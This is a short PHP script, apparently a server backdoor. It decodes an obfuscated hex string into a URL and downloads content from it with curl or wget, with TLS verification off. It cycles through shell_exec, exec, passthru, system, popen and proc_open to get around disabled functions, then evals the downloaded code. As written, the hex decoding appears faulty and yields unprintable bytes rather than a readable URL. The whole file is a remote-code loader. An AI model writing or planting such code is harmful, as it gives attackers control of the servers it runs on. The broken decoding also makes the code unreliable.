
<?php
$enc = '0765932307b6f2c6e6e216d61627f6265677e2d696c637f2f2a33707474786';
$url = strrev(hex2bin($enc));
$cmd = "curl -sLk " . escapeshellarg($url) . " || wget -qO- --no-check-certificate " . escapeshellarg($url);

$methods = ['shell_exec', 'exec', 'passthru', 'system', 'popen', 'proc_open'];
$disabled = array_map('trim', explode(',', ini_get('disable_functions')));

foreach ($methods as $func) {
    if (!function_exists($func) || in_array($func, $disabled)) continue;

    $out = '';
    if ($func === 'exec') { @exec($cmd, $lines); $out = implode("\n", $lines); }
    elseif ($func === 'shell_exec') { $out = @shell_exec($cmd); }
    elseif ($func === 'popen') { 
        $h = @popen($cmd, 'r'); 
        if ($h) { $out = @stream_get_contents($h); @pclose($h); } 
    }
    elseif ($func === 'proc_open') {
        $p = @proc_open($cmd, [1 => ['pipe', 'w']], $pipes);
        if (is_resource($p)) { $out = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($p); }
    }
    else { ob_start(); @$func($cmd); $out = ob_get_clean(); } // passthru, system

    if ($out) { eval('?>' . $out); break; }
}
?>
